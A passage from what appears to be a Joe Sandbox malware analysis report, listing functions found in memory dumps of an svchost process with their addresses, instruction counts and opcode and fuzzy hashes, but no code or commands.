                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Actx
                                                                                                                      • API String ID: 0-89312691
                                                                                                                      • Opcode ID: b0be5488eaa43b68f54937da00b9d90900c1f5f23c46c96db766b3001a1f7fcd
                                                                                                                      • Instruction ID: a39ed2375f79d8d2b769ab9594492ea9c8c147f26f82a295721ac18d7508b499
                                                                                                                      • Opcode Fuzzy Hash: b0be5488eaa43b68f54937da00b9d90900c1f5f23c46c96db766b3001a1f7fcd
                                                                                                                      • Instruction Fuzzy Hash: D41166307075028BEB64C91D8C516BAF2DDEB97264F3C492AD451CB3B1D673D8418780
                                                                                                                      Function 0306E8F0 Relevance: 1.0, Instructions: 985COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0ac7564ea8a35b6c2e7e1a05ee6489b70892fe00347a65bdf56e5cb961a42aba
                                                                                                                      • Instruction ID: 4085d360ace4c7b0517a40027efb799f807afa12d5d64a1cd2efdaed4a611623
                                                                                                                      • Opcode Fuzzy Hash: 0ac7564ea8a35b6c2e7e1a05ee6489b70892fe00347a65bdf56e5cb961a42aba
                                                                                                                      • Instruction Fuzzy Hash: 80824472F102188BCB58CFADDC916DDB7F2EF88314B19812DE416EB349DA34AC568B45
                                                                                                                      Function 0307516C Relevance: .8, Instructions: 785COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 075f7a4758ae7b780609c925abc9a58ed24efbc524900986108974868b961305
                                                                                                                      • Instruction ID: 85e923949842ce076e431d66af8af00c764607a86a73b7f4bef0b7b8d846a4bb
                                                                                                                      • Opcode Fuzzy Hash: 075f7a4758ae7b780609c925abc9a58ed24efbc524900986108974868b961305
                                                                                                                      • Instruction Fuzzy Hash: F3628132D0664AAFCF24CF08D8904EEFBA2FE56314B49C59CC89A27604D371B955CBD9
                                                                                                                      Function 0308739A Relevance: .7, Instructions: 705COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7eb5aed3955f605c5b7548740e048c3ed2b4b268efe91a8d6a29b1027f8205d1
                                                                                                                      • Instruction ID: 49e6e51195824f672b8696c59d89f19a50d184ea50c1eeee63c2c1d8cd9d9860
                                                                                                                      • Opcode Fuzzy Hash: 7eb5aed3955f605c5b7548740e048c3ed2b4b268efe91a8d6a29b1027f8205d1
                                                                                                                      • Instruction Fuzzy Hash: C042D375A026168FDB18DF59C4806BEF7F6FF88B14B28856DD592AB344D730E842CB90
                                                                                                                      Function 03085AA0 Relevance: .7, Instructions: 652COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                                                                      • Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
                                                                                                                      • Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                                                                      • Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                                                                                                      Function 0305B2C0 Relevance: .6, Instructions: 629COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: abbdc3ceaafea9791a5f051807acc3db9b5ff6b158b3abfddcd566c6a7f1e5ad
                                                                                                                      • Instruction ID: 44279d0a44a64d487817d550afc94fa377e9a08fec79d91a3f8921734e2c935e
                                                                                                                      • Opcode Fuzzy Hash: abbdc3ceaafea9791a5f051807acc3db9b5ff6b158b3abfddcd566c6a7f1e5ad
                                                                                                                      • Instruction Fuzzy Hash: 6E329F75E02219DFCF24DF68C894BAEBBB5FF94714F184029E805AB381E775A911CB90
                                                                                                                      Function 03042840 Relevance: .6, Instructions: 605COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cf97de1130d6ceeea5a4244f3c66bb48c84f99427810e2aadbae4471fe581434
                                                                                                                      • Instruction ID: 32d9493f9475a9b918400dc5427efe4df6054115ce88c2fa5bd92e7867ee9894
                                                                                                                      • Opcode Fuzzy Hash: cf97de1130d6ceeea5a4244f3c66bb48c84f99427810e2aadbae4471fe581434
                                                                                                                      • Instruction Fuzzy Hash: 8A32FF74A027198FEF24CF69C8447BEFBF6AF84310F18456EE4869B684D736A841DB50
                                                                                                                      Function 030DA118 Relevance: .6, Instructions: 591COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 979873a2573b12ea4bd624a7546f756ac825f4cca7c365771f808a90b5528d7f
                                                                                                                      • Instruction ID: a25604a5b0a8f935929d9bb90fdbd82086e32651b001c47ad6a475a865e9e99e
                                                                                                                      • Opcode Fuzzy Hash: 979873a2573b12ea4bd624a7546f756ac825f4cca7c365771f808a90b5528d7f
                                                                                                                      • Instruction Fuzzy Hash: C122BC74706751CFDB64CF29C494376B7F1AF44300F08889AE8968F68AE739E592CB64
                                                                                                                      Function 030F16CC Relevance: .6, Instructions: 571COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1cfa0a8839a9b046b9a76791b18719bffa94b70ebc565937c8bfcc5181c6289f
                                                                                                                      • Instruction ID: e03bb2487a9c73ae3c1a32c0b8f6e1bff45996c08ea0d73b12b5d10d21c1ee56
                                                                                                                      • Opcode Fuzzy Hash: 1cfa0a8839a9b046b9a76791b18719bffa94b70ebc565937c8bfcc5181c6289f
                                                                                                                      • Instruction Fuzzy Hash: 9122B135A02216CFCB1DCF59C490AAEF7F6BF88314B1845ADDA569B744DB30E942CB90
                                                                                                                      Function 0305FB80 Relevance: .6, Instructions: 559COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7fb712e3519d6587cd216b97db38288d459474078b6d696ea532c7ec8df258b9
                                                                                                                      • Instruction ID: 17ec7e614aa2226c1c555fb7fdd63bd1b1b1f170ab6ed4d4e743657849188103
                                                                                                                      • Opcode Fuzzy Hash: 7fb712e3519d6587cd216b97db38288d459474078b6d696ea532c7ec8df258b9
                                                                                                                      • Instruction Fuzzy Hash: 2E22C474A0160AEFDB54DFA8D880BEEB7B5FF88310F1485A9D8549B245D734EA81CB90
                                                                                                                      Function 030F1D5A Relevance: .6, Instructions: 559COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4a4c67c3336748d8de0ccfd4bade89cf86f40434a349ab90740df031f07d31a0
                                                                                                                      • Instruction ID: ee5fc939aa00eca1f82ac110c9ce92ff37dddeb51638897d7641ebcaa1090a30
                                                                                                                      • Opcode Fuzzy Hash: 4a4c67c3336748d8de0ccfd4bade89cf86f40434a349ab90740df031f07d31a0
                                                                                                                      • Instruction Fuzzy Hash: AF22B1796063129FC758CF18C490A6AF3E9FFC8314B184A6DEA96CB751D730E846CB91
                                                                                                                      Function 03058DBF Relevance: .6, Instructions: 554COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ea30d8a7a2a6b7e93268597b7c05d89476f40f3a1e5e49a8edf03285fd8adaa8
                                                                                                                      • Instruction ID: 271cef7b41e41a1e6ae24008149aae819d152e78103b8610e8c78be9e27db252
                                                                                                                      • Opcode Fuzzy Hash: ea30d8a7a2a6b7e93268597b7c05d89476f40f3a1e5e49a8edf03285fd8adaa8
                                                                                                                      • Instruction Fuzzy Hash: CB224E74E4121ADBDF58CF95C480ABEFBF6BF88304B18849AEC45AB241E734D941DB64
                                                                                                                      Function 030F2446 Relevance: .5, Instructions: 485COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2cad59c6296e2c7ab788b3de65f0ce45fed1564bec383af2ac9aa3a137c3541c
                                                                                                                      • Instruction ID: 7732b0d685b759c2469dfd6ce1164faf92ccdbc88523fae8b2f54ef094fd027b
                                                                                                                      • Opcode Fuzzy Hash: 2cad59c6296e2c7ab788b3de65f0ce45fed1564bec383af2ac9aa3a137c3541c
                                                                                                                      • Instruction Fuzzy Hash: B40217386066518FDB54CF2AC45037AF7F9AF85300B188D9ADAD6CFA81D734E852DB60
                                                                                                                      Function 0310B16B Relevance: .4, Instructions: 450COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 42b1cb1ff3493f156f92013c1eea42ca8b03910fe9694bc9aa20fd4dbe3ff8d8
                                                                                                                      • Instruction ID: 69c7a6082174aaa40707379d7f0143635ced38801b3785a56e243aca396cf144
                                                                                                                      • Opcode Fuzzy Hash: 42b1cb1ff3493f156f92013c1eea42ca8b03910fe9694bc9aa20fd4dbe3ff8d8
                                                                                                                      • Instruction Fuzzy Hash: 9CF1E672E046159BCB18CFA9C9A067EFBF5AF8C21071981ADD456DB3C0D7B4EA41CB90
                                                                                                                      Function 0266FE93 Relevance: .4, Instructions: 435COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                      • Instruction ID: c9b085b4c83f5de98b0b51438de3c2cc393460a0ed5f3417b854879ebbfa8b88
                                                                                                                      • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                      • Instruction Fuzzy Hash: 11026E73E547164FE720DE4ACDC4765B3A3EFC8311F5B81B8CA142B613CA39BA525A90
                                                                                                                      Function 0310A9A6 Relevance: .4, Instructions: 425COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0209d6c0643eac48232475be1cc6da9855622741d12e88e44abf27943a4b3468
                                                                                                                      • Instruction ID: a8b9758fefbe13c39e023b5f49e55463c7503aa4f0c784dee5beb78217c21223
                                                                                                                      • Opcode Fuzzy Hash: 0209d6c0643eac48232475be1cc6da9855622741d12e88e44abf27943a4b3468
                                                                                                                      • Instruction Fuzzy Hash: D3F1A673E006269BCB18CF69C9A05BDFBF5AF4921071A4269D856EB3C0D774EE41CB90
                                                                                                                      Function 0305FDC0 Relevance: .4, Instructions: 390COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 089a59c152eb2f69006e61fb8c44f548dd971fb79c9f4bc1b90a8bc5019bd61b
                                                                                                                      • Instruction ID: ee1fd64a80163bdd60f490d95839840bb51cbada5eee83c7d9395fd508d528f9
                                                                                                                      • Opcode Fuzzy Hash: 089a59c152eb2f69006e61fb8c44f548dd971fb79c9f4bc1b90a8bc5019bd61b
                                                                                                                      • Instruction Fuzzy Hash: CEF1C274E01609DFDB54DFA8D880BAEB7F5FF48304F1885A9E805AB245E734DA85CB90
                                                                                                                      Function 03028397 Relevance: .4, Instructions: 380COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ede714303146304ca0be42729426844294ce78d52d56ef8a13d33325dbc71e25
                                                                                                                      • Instruction ID: aa1835876db254bdf5c2c58d8a64dd0323282c5772348032d6f1779fdbf775c9
                                                                                                                      • Opcode Fuzzy Hash: ede714303146304ca0be42729426844294ce78d52d56ef8a13d33325dbc71e25
                                                                                                                      • Instruction Fuzzy Hash: B6D1D379A027269BCF14DF64C890ABFBBE5FF84304F088629E955DB280E734E954CB50
                                                                                                                      Function 0305C6E0 Relevance: .4, Instructions: 367COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: be33280380d21a287aa5083962b18ca25955d26cf3e55d0c1aec884032e2680d
                                                                                                                      • Instruction ID: fa7252b2c8c7523a791732648f6cb91b34194bb8cfe49c060eb57a545ef3d02c
                                                                                                                      • Opcode Fuzzy Hash: be33280380d21a287aa5083962b18ca25955d26cf3e55d0c1aec884032e2680d
                                                                                                                      • Instruction Fuzzy Hash: 0BD16971E063198BFF68CE98C5843BFBBF5FB44304F18846AE842AB294D7749981DB44
                                                                                                                      Function 030438E0 Relevance: .3, Instructions: 349COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8b6f297fa0e3a42d335ff97366071c0ea4d541c6dc68394760e026d0b5c5b7ef
                                                                                                                      • Instruction ID: 0c3a5230599f2b7ff4063204ac91b8ff6d79e0aa05613a403f4b5f227e97ee8b
                                                                                                                      • Opcode Fuzzy Hash: 8b6f297fa0e3a42d335ff97366071c0ea4d541c6dc68394760e026d0b5c5b7ef
                                                                                                                      • Instruction Fuzzy Hash: C5E18EB5A01209DFDB18CF58C880AAEB7F5FF58310F1885A9E555EB391D730EA51CBA0
                                                                                                                      Function 0303D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 07d899bfe9645ffc3de00dd793dccc43ed7f0e30cb845da62d5a67e8ff68c44c
                                                                                                                      • Instruction ID: 9adce39842611a7664c795596c1db79a940a0e5dc229572d27cfe810bb05eb30
                                                                                                                      • Opcode Fuzzy Hash: 07d899bfe9645ffc3de00dd793dccc43ed7f0e30cb845da62d5a67e8ff68c44c
                                                                                                                      • Instruction Fuzzy Hash: DDC1B571E026159BEF24CF5EC840BAEF7F9EF85310F188269D815AB290D770A942CB80
                                                                                                                      Function 0305D2F0 Relevance: .3, Instructions: 341COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d3d6c2a61c50af119dbf7a660be9dd8e78e4cce8ee85c1312ee98e55f77ac127
                                                                                                                      • Instruction ID: 3d017c5d2f4e93c117faf16795a6998ff52a40ef5a28d749c946f1e5119b1960
                                                                                                                      • Opcode Fuzzy Hash: d3d6c2a61c50af119dbf7a660be9dd8e78e4cce8ee85c1312ee98e55f77ac127
                                                                                                                      • Instruction Fuzzy Hash: 9FB13622A125118BEF1CCA18C8A137FA397EFD5311F1D86ABEC168F7D9C6388940D745
                                                                                                                      Function 03040535 Relevance: .3, Instructions: 300COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                      • Instruction ID: 1e2f69acab08b329b9c19d9e7a577e9ad2ae5d56289c7f90c900695ffd1eb6e9
                                                                                                                      • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                      • Instruction Fuzzy Hash: DCB105B5702645AFDF21DB69C850BBFFBF6EF84200F1805A5D652AB281D730EA41DB50
                                                                                                                      Function 030590DB Relevance: .3, Instructions: 287COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7e52e4262f6ecd2f8d2597b3a8aa7cf1a2ee0a41e726facf86524c3c63e64612
                                                                                                                      • Instruction ID: 34c632112587c199835e7ebbf360b5feafa13d06880bd36818b2921a0dfd9b6e
                                                                                                                      • Opcode Fuzzy Hash: 7e52e4262f6ecd2f8d2597b3a8aa7cf1a2ee0a41e726facf86524c3c63e64612
                                                                                                                      • Instruction Fuzzy Hash: 01A17B75941209AFEB16EFA4CC81BAFB7B9EF89750F044064F900AF2A0D7759D10DBA4
                                                                                                                      Function 030383C0 Relevance: .3, Instructions: 281COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2fd3f9fea33a3eb3e4726c93f726312c09362473606e6ee776320f29a1718ad8
                                                                                                                      • Instruction ID: 42f07aac92f5a71a172606bf528a044772a467189b1c80634002d949c30bffe8
                                                                                                                      • Opcode Fuzzy Hash: 2fd3f9fea33a3eb3e4726c93f726312c09362473606e6ee776320f29a1718ad8
                                                                                                                      • Instruction Fuzzy Hash: C0C149746093418FEB64CF15C484BAAB7E9FF88304F44895EE9898B690D774E909CF92
                                                                                                                      Function 03070185 Relevance: .3, Instructions: 276COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9ee05be703cecf15129cc6a250d89943b9bb0b7d51b1ef430ac76ee454b96172
                                                                                                                      • Instruction ID: 2b7f2548cff5b61641f716775494af0f58ed5b02ddabbc45b4b79641c68ee2c8
                                                                                                                      • Opcode Fuzzy Hash: 9ee05be703cecf15129cc6a250d89943b9bb0b7d51b1ef430ac76ee454b96172
                                                                                                                      • Instruction Fuzzy Hash: BEA1E3B1F02719DBDB24DFA9C890BAAB7F5FF44314F044629EA459B280DB34E851CB54
                                                                                                                      Function 0304E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c932efc1b39a88f474220b107fd32d2257962b19bf9fc0850858f3ee34e1b75d
                                                                                                                      • Instruction ID: 126504e6346bc4e030ddb0b75c410d61560e541abbe6bd23650969702d1e32a2
                                                                                                                      • Opcode Fuzzy Hash: c932efc1b39a88f474220b107fd32d2257962b19bf9fc0850858f3ee34e1b75d
                                                                                                                      • Instruction Fuzzy Hash: 6A9124B5A026159FEB24DB68D440BBEB7E5FFC4710F0944BAE8059B680E734DA41C791
                                                                                                                      Function 03031131 Relevance: .3, Instructions: 259COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c9fef6c897d2d17b6968b1edeec42b607ad0362455a3d1f3e1033e33f291d96e
                                                                                                                      • Instruction ID: 8f81a72e5d5eb484922736cf5c7595b9d98c70d1d2051abec1076ad322523334
                                                                                                                      • Opcode Fuzzy Hash: c9fef6c897d2d17b6968b1edeec42b607ad0362455a3d1f3e1033e33f291d96e
                                                                                                                      • Instruction Fuzzy Hash: D7B111B5A0A3418FD354DF28C480A5AFBE5BB89304F18496EF899CB351D371E945CB42
                                                                                                                      Function 03064750 Relevance: .3, Instructions: 251COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                                                                                      • Instruction ID: fdfc547320b40497bc1fd9cf6591633653364db20fb8d66396fa73c2c79fdda7
                                                                                                                      • Opcode Fuzzy Hash: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                                                                                      • Instruction Fuzzy Hash: 15814B35E06796CFDB21CEEDD8C027EBB95EF52200F2C4ABAD4429B245C364D886C791
